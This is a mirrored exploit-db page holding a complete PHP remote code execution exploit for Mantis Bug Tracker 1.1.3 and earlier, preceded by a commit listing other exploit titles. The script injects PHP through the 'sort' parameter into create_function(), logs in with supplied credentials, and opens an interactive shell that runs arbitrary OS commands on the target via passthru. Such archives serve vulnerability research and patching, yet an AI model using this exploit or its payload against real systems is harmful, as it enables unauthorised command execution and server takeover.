bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/6768.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

136 lines
4.4 KiB
Text
Executable file
Raw Blame History

<?php
/*
--------------------------------------------------------------------------------
Mantis Bug Tracker <= 1.1.3 (manage_proj_page.php) Remote Code Execution Exploit
--------------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.mantisbt.org/
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /manage_proj_page.php
32. $f_sort = gpc_get_string( 'sort', 'name' ); <=== this is taken and stripslashed from $_GET['sort']
33. $f_dir = gpc_get_string( 'dir', 'ASC' );
(...)
89. $t_projects = multi_sort( $t_full_projects, $f_sort, $t_direction ); <=== and here is passed to multi_sort()
90. $t_stack = array( $t_projects );
[-] multi_sort() function defined into /core/utility_api.php
185. # --------------------
186. # Sort a multi-dimensional array by one of its keys
187. function multi_sort( $p_array, $p_key, $p_direction=ASCENDING ) {
188. if ( DESCENDING == $p_direction ) {
189. $t_factor = -1;
190. } else {
191. # might as well allow everything else to mean ASC rather than erroring
192. $t_factor = 1;
193. }
194.
195. $t_function = create_function( '$a, $b', "return $t_factor * strnatcasecmp( \$a['$p_key'], \$b['$p_key'] );" );
196. uasort( $p_array, $t_function );
197. return $p_array;
198. }
An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed to create_function()
at line 195 into multi_sort() function body. By default only registered users can access to manage_proj_page.php
(I've tested this on 1.1.3 version), because of this sometimes this PoC works only with a valid account.
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function check_login()
{
global $host, $path, $user, $pass, $cookie;
$packet = "GET {$path}manage_proj_page.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match("/Location: login_page.php/", http_send($host, $packet)))
{
if (isset($pass))
{
$payload = "username={$user}&password={$pass}";
$packet = "POST {$path}login.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID=".md5("foo")."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!preg_match("/Set-Cookie: (.*);/", http_send($host, $packet), $match)) die("\n[-] Login failed...\n");
$cookie = $match[1];
}
else die("\n[-] Credentials needed...\n");
}
}
print "\n+-------------------------------------------------------------------+";
print "\n| Mantis Bug Tracker <= 1.1.3 Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path [user] [password]\n";
print "\nExample....: php $argv[0] localhost /mantis/";
print "\nExample....: php $argv[0] localhost / user pass\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
check_login();
$code = "']);}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}manage_proj_page.php?sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID=".md5("foo").(isset($cookie) ? "; {$cookie}" : "")."\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nmantis-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# milw0rm.com [2008-10-16]
Reference in a new issue View git blame Copy permalink